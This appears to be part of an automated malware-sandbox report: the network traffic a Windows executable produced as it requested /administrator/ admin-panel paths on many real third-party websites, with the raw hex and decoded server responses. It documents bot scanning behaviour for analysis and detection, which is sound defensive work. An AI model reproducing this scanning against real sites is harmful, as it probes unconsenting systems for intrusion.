3a 31 35 30 70 78 3b 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 62 6f 6c 64 3b 22 3e 34 30 34 3c 2f 68 31 3e 0a 3c 68 32 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 2d 74 6f 70 3a 32 30 70 78 3b 66 6f 6e 74 2d 73 69 7a 65 3a 20 33 30 70 78 3b 22 3e 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 68 32 3e 0a 3c 70 3e 54 68 65 20 72 65 73 6f 75 72 63 65 20 72 65 71 75 65 73 74 65 64 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 21 3c 2f 70 3e 0a 3c 2f 64 69 76 3e 3c 2f 64 69 76 3e 3c 64 69 76 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 23 66 30 66 30 66 30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 32 70 78 3b 6d 61 72 67 69 6e 3a 61 75 74 6f 3b 70 61 64 64 69 6e 67 3a 30 70 78 20 33 30 70 78 20 30 70 78 20 33 30 70 78 3b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 3b 63 6c 65 61 72 3a 62 6f 74 68 3b 68 65 69 67 68 74 3a 31 30 30 70 78 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 2d 31 30 31 70 78 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 34 37 34 37 34 37 3b 62 6f 72 64 65 72 2d 74 6f 70 3a 20 31 70 78 20 73 6f 6c 69 64 20 72 67 62 61 28 30 2c 30 2c 30 2c 30 2e 31 35 29 3b 62 6f 78 2d 73 68 61 64 6f 77 3a 20 30 20 31 70 78 20 30 20 72 67 62 61 28 32 35 35 2c 20 32 35 35 2c 20 32 35 35 2c 20 30 2e 33 29 20 69 6e 73 65 74 3b 22 3e 0a 3c 62 72 3e 50 72 6f 75 64 6c 79 20 70 6f 77 65 72 65 64 20 62 79 20 20 3c 61 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 23 66 66 66 3b 22 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f
                                                                                                                                                                                                    Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">404</h1><h2 style="margin-top:20px;font-size: 30px;">Not Found</h2><p>The resource requested could not be found on this server!</p></div></div><div style="color:#f0f0f0; font-size:12px;margin:auto;padding:0px 30px 0px 30px;position:relative;clear:both;height:100px;margin-top:-101px;background-color:#474747;border-top: 1px solid rgba(0,0,0,0.15);box-shadow: 0 1px 0 rgba(255, 255, 255, 0.3) inset;"><br>Proudly powered by <a style="color:#fff;" href="http://
                                                                                                                                                                                                    Nov 26, 2023 06:59:29.815511942 CET281INData Raw: 77 77 77 2e 6c 69 74 65 73 70 65 65 64 74 65 63 68 2e 63 6f 6d 2f 65 72 72 6f 72 2d 70 61 67 65 22 3e 4c 69 74 65 53 70 65 65 64 20 57 65 62 20 53 65 72 76 65 72 3c 2f 61 3e 3c 70 3e 50 6c 65 61 73 65 20 62 65 20 61 64 76 69 73 65 64 20 74 68 61
                                                                                                                                                                                                    Data Ascii: www.litespeedtech.com/error-page">LiteSpeed Web Server</a><p>Please be advised that LiteSpeed Technologies Inc. is not a web hosting company and, as such, has no control over content found on this site.</p></div></body></html>
                                                                                                                                                                                                    Nov 26, 2023 06:59:29.816031933 CET278OUTGET /administrator/index.php HTTP/1.1
                                                                                                                                                                                                    Host: t1eng.com
                                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                                    Accept-Encoding: deflate, gzip
                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                    Referer: http://t1eng.com/administrator/
                                                                                                                                                                                                    Nov 26, 2023 06:59:29.909394026 CET1340INHTTP/1.1 404 Not Found
                                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                                    Keep-Alive: timeout=5, max=100
                                                                                                                                                                                                    cache-control: private, no-cache, no-store, must-revalidate, max-age=0
                                                                                                                                                                                                    pragma: no-cache
                                                                                                                                                                                                    content-type: text/html
                                                                                                                                                                                                    content-length: 1238
                                                                                                                                                                                                    date: Sun, 26 Nov 2023 05:59:29 GMT
                                                                                                                                                                                                    server: LiteSpeed
                                                                                                                                                                                                    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 20 68 65 69 67 68 74 3a 31 30 30 25 3b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 22 3e 0a 3c 64 69 76 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 61 75 74 6f 3b 20 6d 69 6e 2d 68 65 69 67 68 74 3a 31 30 30 25 3b 20 22 3e 20 20 20 20 20 3c 64 69 76 20 73 74 79 6c 65 3d 22 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 20 77 69 64 74 68 3a 38 30 30 70 78 3b 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 2d 34 30 30 70 78 3b 20 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 20 74 6f 70 3a 20 33 30 25 3b 20 6c 65 66 74 3a 35 30 25 3b 22 3e 0a 20 20 20 20 20 20 20 20 3c 68 31 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 3a 30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 35 30 70 78 3b 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 35 30 70 78 3b 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 62 6f 6c 64 3b 22 3e 34 30 34 3c 2f 68 31 3e 0a 3c 68 32 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 2d 74 6f 70 3a 32 30 70 78 3b 66 6f 6e 74 2d 73 69 7a 65 3a 20 33 30 70 78 3b 22 3e 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 68 32 3e 0a 3c 70 3e 54 68 65 20 72 65 73 6f 75 72 63 65 20 72 65 71 75 65 73 74 65 64 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 21 3c 2f 70 3e 0a 3c 2f 64 69 76 3e 3c 2f 64 69 76 3e 3c 64 69 76 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 23 66 30 66 30 66 30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 32 70 78 3b 6d 61 72 67 69 6e 3a 61 75 74 6f 3b 70 61 64 64 69 6e 67 3a 30 70 78 20 33 30 70 78 20 30 70 78 20 33 30 70 78 3b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 3b 63 6c 65 61 72 3a 62 6f 74 68 3b 68 65 69 67 68 74 3a 31 30 30 70 78 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 2d 31 30 31 70 78 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 34 37 34 37 34 37 3b 62 6f 72 64 65 72 2d 74 6f 70 3a 20 31 70 78 20 73 6f 6c 69 64 20 72 67 62 61 28 30 2c 30 2c 30 2c 30 2e 31 35 29 3b 62 6f 78 2d 73 68 61 64 6f 77 3a 20 30 20 31 70 78 20 30 20 72 67 62 61 28 32 35 35 2c 20 32 35 35 2c 20 32 35 35 2c 20 30 2e 33 29 20 69 6e 73 65 74 3b 22 3e 0a 3c 62 72 3e 50 72 6f 75 64 6c 79 20 70 6f 77 65 72 65 64 20 62 79 20 20 3c 61 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 23 66 66 66 3b 22 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f
                                                                                                                                                                                                    Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">404</h1><h2 style="margin-top:20px;font-size: 30px;">Not Found</h2><p>The resource requested could not be found on this server!</p></div></div><div style="color:#f0f0f0; font-size:12px;margin:auto;padding:0px 30px 0px 30px;position:relative;clear:both;height:100px;margin-top:-101px;background-color:#474747;border-top: 1px solid rgba(0,0,0,0.15);box-shadow: 0 1px 0 rgba(255, 255, 255, 0.3) inset;"><br>Proudly powered by <a style="color:#fff;" href="http://
                                                                                                                                                                                                    Nov 26, 2023 06:59:29.909413099 CET281INData Raw: 77 77 77 2e 6c 69 74 65 73 70 65 65 64 74 65 63 68 2e 63 6f 6d 2f 65 72 72 6f 72 2d 70 61 67 65 22 3e 4c 69 74 65 53 70 65 65 64 20 57 65 62 20 53 65 72 76 65 72 3c 2f 61 3e 3c 70 3e 50 6c 65 61 73 65 20 62 65 20 61 64 76 69 73 65 64 20 74 68 61
                                                                                                                                                                                                    Data Ascii: www.litespeedtech.com/error-page">LiteSpeed Web Server</a><p>Please be advised that LiteSpeed Technologies Inc. is not a web hosting company and, as such, has no control over content found on this site.</p></div></body></html>


                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                    15192.168.2.453707162.241.224.218806240C:\Users\user\Desktop\klWGq3yDcQ.exe
                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                    Nov 26, 2023 06:59:29.722096920 CET282OUTGET /administrator/index.php HTTP/1.1
                                                                                                                                                                                                    Host: gasp-ga.com
                                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                                    Accept-Encoding: deflate, gzip
                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                    Referer: http://gasp-ga.com/administrator/
                                                                                                                                                                                                    Nov 26, 2023 06:59:29.908504963 CET280INHTTP/1.1 409 Conflict
                                                                                                                                                                                                    Date: Sun, 26 Nov 2023 05:59:29 GMT
                                                                                                                                                                                                    Server: Apache
                                                                                                                                                                                                    Content-Length: 83
                                                                                                                                                                                                    Content-Type: text/html; charset=iso-8859-1
                                                                                                                                                                                                    Data Raw: 3c 73 63 72 69 70 74 3e 64 6f 63 75 6d 65 6e 74 2e 63 6f 6f 6b 69 65 20 3d 20 22 68 75 6d 61 6e 73 5f 32 31 39 30 39 3d 31 22 3b 20 64 6f 63 75 6d 65 6e 74 2e 6c 6f 63 61 74 69 6f 6e 2e 72 65 6c 6f 61 64 28 74 72 75 65 29 3c 2f 73 63 72 69 70 74 3e
                                                                                                                                                                                                    Data Ascii: <script>document.cookie = "humans_21909=1"; document.location.reload(true)</script>


                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                    16192.168.2.45506115.197.142.173806240C:\Users\user\Desktop\klWGq3yDcQ.exe
                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                    Nov 26, 2023 06:59:30.185000896 CET233OUTGET /administrator/ HTTP/1.1
                                                                                                                                                                                                    Host: greenrworld.com
                                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                                    Accept-Encoding: deflate, gzip
                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                    Nov 26, 2023 06:59:30.285145998 CET419INHTTP/1.1 404 Not Found
                                                                                                                                                                                                    Date: Sun, 26 Nov 2023 05:59:30 GMT
                                                                                                                                                                                                    Content-Type: text/html; charset=utf-8
                                                                                                                                                                                                    Content-Length: 125
                                                                                                                                                                                                    Connection: keep-alive
                                                                                                                                                                                                    Server: ip-10-123-123-117.ec2.internal
                                                                                                                                                                                                    X-Request-Id: 0809a905-3e9a-44dc-8e7b-9846c682d50a
                                                                                                                                                                                                    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 3e 3c 68 74 6d 6c 20 6c 61 6e 67 3d 27 65 6e 2d 75 73 27 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 2a 2a 20 4e 6f 74 20 46 6f 75 6e 64 20 2a 2a 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 48 54 54 50 20 53 74 61 74 75 73 3a 20 34 30 34 20 28 6e 6f 74 20 66 6f 75 6e 64 29 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e
                                                                                                                                                                                                    Data Ascii: <!DOCTYPE HTML><html lang='en-us'><head><title>** Not Found **</title></head><body>HTTP Status: 404 (not found)</body></html>
                                                                                                                                                                                                    Nov 26, 2023 06:59:30.285533905 CET290OUTGET /administrator/index.php HTTP/1.1
                                                                                                                                                                                                    Host: greenrworld.com
                                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                                    Accept-Encoding: deflate, gzip
                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                    Referer: http://greenrworld.com/administrator/
                                                                                                                                                                                                    Nov 26, 2023 06:59:30.385456085 CET419INHTTP/1.1 404 Not Found
                                                                                                                                                                                                    Date: Sun, 26 Nov 2023 05:59:30 GMT
                                                                                                                                                                                                    Content-Type: text/html; charset=utf-8
                                                                                                                                                                                                    Content-Length: 125
                                                                                                                                                                                                    Connection: keep-alive
                                                                                                                                                                                                    Server: ip-10-123-123-133.ec2.internal
                                                                                                                                                                                                    X-Request-Id: bc230627-bd1b-46ec-9823-cdff25e1e0bb
                                                                                                                                                                                                    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 3e 3c 68 74 6d 6c 20 6c 61 6e 67 3d 27 65 6e 2d 75 73 27 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 2a 2a 20 4e 6f 74 20 46 6f 75 6e 64 20 2a 2a 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 48 54 54 50 20 53 74 61 74 75 73 3a 20 34 30 34 20 28 6e 6f 74 20 66 6f 75 6e 64 29 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e
                                                                                                                                                                                                    Data Ascii: <!DOCTYPE HTML><html lang='en-us'><head><title>** Not Found **</title></head><body>HTTP Status: 404 (not found)</body></html>


                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                    17192.168.2.455073104.200.30.31806240C:\Users\user\Desktop\klWGq3yDcQ.exe
                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                    Nov 26, 2023 06:59:30.203334093 CET233OUTGET /administrator/ HTTP/1.1
                                                                                                                                                                                                    Host: edgewater.group
                                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                                    Accept-Encoding: deflate, gzip
                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                    Nov 26, 2023 06:59:30.302550077 CET467INHTTP/1.1 302 Found
                                                                                                                                                                                                    Date: Sun, 26 Nov 2023 05:59:30 GMT
                                                                                                                                                                                                    Server: Apache
                                                                                                                                                                                                    Location: https://edgewater.group/administrator/
                                                                                                                                                                                                    Content-Length: 222
                                                                                                                                                                                                    Content-Type: text/html; charset=iso-8859-1
                                                                                                                                                                                                    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 64 6f 63 75 6d 65 6e 74 20 68 61 73 20 6d 6f 76 65 64 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 65 64 67 65 77 61 74 65 72 2e 67 72 6f 75 70 2f 61 64 6d 69 6e 69 73 74 72 61 74 6f 72 2f 22 3e 68 65 72 65 3c 2f 61 3e 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                                                                                                                                                    Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>302 Found</title></head><body><h1>Found</h1><p>The document has moved <a href="https://edgewater.group/administrator/">here</a>.</p></body></html>
                                                                                                                                                                                                    Nov 26, 2023 06:59:32.259356022 CET291OUTGET /administrator/index.php HTTP/1.1
                                                                                                                                                                                                    Host: edgewater.group
                                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                                    Accept-Encoding: deflate, gzip
                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                    Referer: https://edgewater.group/administrator/
                                                                                                                                                                                                    Nov 26, 2023 06:59:32.359175920 CET485INHTTP/1.1 302 Found
                                                                                                                                                                                                    Date: Sun, 26 Nov 2023 05:59:32 GMT
                                                                                                                                                                                                    Server: Apache
                                                                                                                                                                                                    Location: https://edgewater.group/administrator/index.php
                                                                                                                                                                                                    Content-Length: 231
                                                                                                                                                                                                    Content-Type: text/html; charset=iso-8859-1
                                                                                                                                                                                                    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 64 6f 63 75 6d 65 6e 74 20 68 61 73 20 6d 6f 76 65 64 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 65 64 67 65 77 61 74 65 72 2e 67 72 6f 75 70 2f 61 64 6d 69 6e 69 73 74 72 61 74 6f 72 2f 69 6e 64 65 78 2e 70 68 70 22 3e 68 65 72 65 3c 2f 61 3e 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                                                                                                                                                    Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>302 Found</title></head><body><h1>Found</h1><p>The document has moved <a href="https://edgewater.group/administrator/index.php">here</a>.</p></body></html>


                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                    18192.168.2.455057144.202.62.131806240C:\Users\user\Desktop\klWGq3yDcQ.exe
                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                    Nov 26, 2023 06:59:30.203663111 CET238OUTGET /administrator/ HTTP/1.1
                                                                                                                                                                                                    Host: gruporegiosafety.com
                                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                                    Accept-Encoding: deflate, gzip
                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                    Nov 26, 2023 06:59:30.326839924 CET513INHTTP/1.1 301 Moved Permanently
                                                                                                                                                                                                    Date: Sun, 26 Nov 2023 05:59:30 GMT
                                                                                                                                                                                                    Server: Apache
                                                                                                                                                                                                    Location: https://gruporegiosafety.com/administrator/
                                                                                                                                                                                                    Content-Length: 251
                                                                                                                                                                                                    Content-Type: text/html; charset=iso-8859-1
                                                                                                                                                                                                    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 64 6f 63 75 6d 65 6e 74 20 68 61 73 20 6d 6f 76 65 64 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 67 72 75 70 6f 72 65 67 69 6f 73 61 66 65 74 79 2e 63 6f 6d 2f 61 64 6d 69 6e 69 73 74 72 61 74 6f 72 2f 22 3e 68 65 72 65 3c 2f 61 3e 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                                                                                                                                                    Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>301 Moved Permanently</title></head><body><h1>Moved Permanently</h1><p>The document has moved <a href="https://gruporegiosafety.com/administrator/">here</a>.</p></body></html>


                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                    19192.168.2.455079162.250.126.5806240C:\Users\user\Desktop\klWGq3yDcQ.exe
                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                    Nov 26, 2023 06:59:30.220201969 CET238OUTGET /administrator/ HTTP/1.1
                                                                                                                                                                                                    Host: directlendersllc.com
                                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                                    Accept-Encoding: deflate, gzip
                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                    Nov 26, 2023 06:59:30.323107004 CET1006INHTTP/1.1 301 Moved Permanently
                                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                                    Keep-Alive: timeout=5, max=100
                                                                                                                                                                                                    content-type: text/html
                                                                                                                                                                                                    content-length: 707
                                                                                                                                                                                                    date: Sun, 26 Nov 2023 05:59:29 GMT
                                                                                                                                                                                                    server: LiteSpeed
                                                                                                                                                                                                    location: https://mydirectlender.com/administrator/
                                                                                                                                                                                                    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 20 68 65 69 67 68 74 3a 31 30 30 25 3b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 22 3e 0a 3c 64 69 76 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 61 75 74 6f 3b 20 6d 69 6e 2d 68 65 69 67 68 74 3a 31 30 30 25 3b 20 22 3e 20 20 20 20 20 3c 64 69 76 20 73 74 79 6c 65 3d 22 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 20 77 69 64 74 68 3a 38 30 30 70 78 3b 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 2d 34 30 30 70 78 3b 20 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 20 74 6f 70 3a 20 33 30 25 3b 20 6c 65 66 74 3a 35 30 25 3b 22 3e 0a 20 20 20 20 20 20 20 20 3c 68 31 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 3a 30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 35 30 70 78 3b 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 35 30 70 78 3b 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 62 6f 6c 64 3b 22 3e 33 30 31 3c 2f 68 31 3e 0a 3c 68 32 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 2d 74 6f 70 3a 32 30 70 78 3b 66 6f 6e 74 2d 73 69 7a 65 3a 20 33 30 70 78 3b 22 3e 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 0d 0a 3c 2f 68 32 3e 0a 3c 70 3e 54 68 65 20 64 6f 63 75 6d 65 6e 74 20 68 61 73 20 62 65 65 6e 20 70 65 72 6d 61 6e 65 6e 74 6c 79 20 6d 6f 76 65 64 2e 3c 2f 70 3e 0a 3c 2f 64 69 76 3e 3c 2f 64 69 76 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                                                                                                                                                    Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 301 Moved Permanently</title></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">301</h1><h2 style="margin-top:20px;font-size: 30px;">Moved Permanently</h2><p>The document has been permanently moved.</p></div></div></body></html>


                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                    20192.168.2.455072172.67.132.45806240C:\Users\user\Desktop\klWGq3yDcQ.exe
                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                    Nov 26, 2023 06:59:30.234401941 CET231OUTGET /administrator/ HTTP/1.1
                                                                                                                                                                                                    Host: esoft.academy
                                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                                    Accept-Encoding: deflate, gzip
                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                    Nov 26, 2023 06:59:30.378432035 CET719INHTTP/1.1 301 Moved Permanently
                                                                                                                                                                                                    Date: Sun, 26 Nov 2023 05:59:30 GMT
                                                                                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                                                                                    Connection: keep-alive
                                                                                                                                                                                                    Cache-Control: max-age=3600
                                                                                                                                                                                                    Expires: Sun, 26 Nov 2023 06:59:30 GMT
                                                                                                                                                                                                    Location: https://esoft.academy/administrator/
